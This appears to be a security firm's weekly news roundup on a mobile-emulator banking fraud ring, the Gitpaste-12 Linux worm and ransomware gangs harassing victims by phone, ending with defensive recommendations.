Cybersecurity Week in Review: 12/14
Posted by: GuidePoint Security
This week we report on a large-scale financial fraud operation perpetrated by a sophisticated criminal gang and an insidious malware worm targeting Linux devices. We also examine a dangerous trend in ransomware attacks involving in-person harassment and coercion. Also, if you are interested in further information about the SolarWinds Breach, check out our web page here. Our own Digital Forensics and Incident Response team continues to track the SolarWinds breach and has developed resources to help you stay up-to-date with the latest analysis and insights, as well recommendations for how to safeguard your organization.
Major banking fraud operation discovered
Security professionals announced last week the discovery of a major banking fraud operation stealing millions from financial institutions in the US and Europe. Using an infrastructure of approximately 20 mobile device emulators, a professional organized gang spoofed over 16,000 devices.
Researchers speculate that the criminals collected usernames and passwords through previous malware infections on mobile devices or through financial phishing pages. With usernames and passwords in hand, the criminals then used mobile device identifiers to spoof the devices. By applying automation and scripting to access the accounts and assess balances, the criminals then initiated automatic money transfers—always in small enough amounts to not trigger any bank review (think of Office Space).
Prior to discovering and halting the attacks, security professionals estimate that thousands of financial accounts were breached, with millions of dollars stolen.
Notably, the emulators used by the criminals have the ability to work on any banking application that offers online access. The emulators also worked even in instances where transactions required approval via SMS code. Criminals also used customized network scripts that worked with the banking application’s API. In addition to submitting the transaction, these scripts enabled the criminals to monitor communications between the application and the financial institution to ensure that no fraud trigger had been initiated.
Because of the scale and sophistication involved in these attacks, security professionals believe that the criminals were part of a large and experienced organized group with expertise in mobile malware and money laundering.
More about this banking fraud operation is available here.
Malware worm targets servers and IoT devices
A new malware worm, with at least 12 different attack modules, is infiltrating Linux-based x86 servers and Linux internet of things (IoT) devices for botnet expansion.
This highly versatile malware uses GitHub and Pastebin to house malicious component code. Dubbed ‘Gitpaste-12’, the worm first compromises the Linux systems via 11 previously disclosed vulnerabilities (including CVE-2017-5638, CVE-2013-5948, CVE-2017-14135, and CVE-2020-10987). Researchers also believe that the malware may employ brute force password hacking.
The malware script first sets up a ‘cron job’ (a Linux command for scheduling tasks) in Pastebin, and then uses the cron job to execute the script repeatedly. The malware then downloads and executes a script from GitHub containing commands to disable security features. In addition, the malware also prevents system administrators from collecting information about any system processes by intercepting the ‘readdir’ system calls and skipping directories that contain key processes. A library also exists within the malware which downloads and executes further malicious code stored in Pastebin files.
What makes this malware particularly annoying is that it contains ‘wormable’ features, giving it the capability to replicate by launching attacks against other systems.
Security professionals have reported the Pastebin URL. The Git repository was closed in late October, halting botnet proliferation.
You can read more on the Gitpaste-12 malware’s features here.
Ransomware gangs turn to in-person harassment
The FBI reported last week that the DoppelPaymer ransomware gang is intimidating and coercing victims into payment through cold calling. Beginning as early as February 2020, DoppelPaymer criminals began contacting victims to extort payments after infecting the companies’ systems with ransomware. According to the FBI Private Industry Notification (PIN), in one example a DoppelPaymer threat actor used a spoofed US-based telephone number to contact a ransomware victim:
“[the criminal gang member] threatened to leak or sell data from [the identified business] if the business did not pay the ransom. During subsequent telephone calls to the same business, the actor threatened to send an individual to the home of an employee and provided the employee’s home address. The actor also called several of the employee’s relatives.”
Since the DoppelPaymer incidents began last February, several other ransomware gangs have resorted to cold calling victims. The gangs include two now-defunct groups (Sehkmet and Maze), as well as the high-profile Conti and Ryuk gangs.
To mitigate the impact of a ransomware attack, the FBI recommends:
· Ensuring system back-ups are secure (see our article from last week on the criminals targeting back-up files with ransomware.)
· Auditing user accounts regularly, particularly any account that is publicly accessible, such as Remote Monitoring and Management accounts.
· Patching often
· Monitoring inbound and outbound network traffic and setting alerts for data exfiltration
· Using two-factor authentication
· Implementing the principle of ‘least privilege’ for all systems and permissions.
You can read more on this story here and here.
Final Words
We seem to have crossed a major milestone recently. No longer are cybercriminals content to simply send you a poorly worded warning informing you that your system is infected with malware or ransomware and you better pay up. Instead, they’ve resorted to a level of in-person harassment and extortion rarely seen in the professional business world. They’re leveraging connections and expertise in mobile malware and money laundering to build large-scale criminal operations. And they’re being funded and supported by foreign governments. How does a legitimate business compete?
The answer is to ‘stay the course’ and continue to apply key cybersecurity principles:
1. Remember that detection is as important as prevention.
2. Patch vulnerable systems and software.
3. Limit who has access to your systems and accounts.
4. Use two-factor authentication
5. Expect that breaches and compromises are going to happen. Be prepared to mitigate.
Cybersecurity equals action. You get out what you put into it.
GuidePoint Security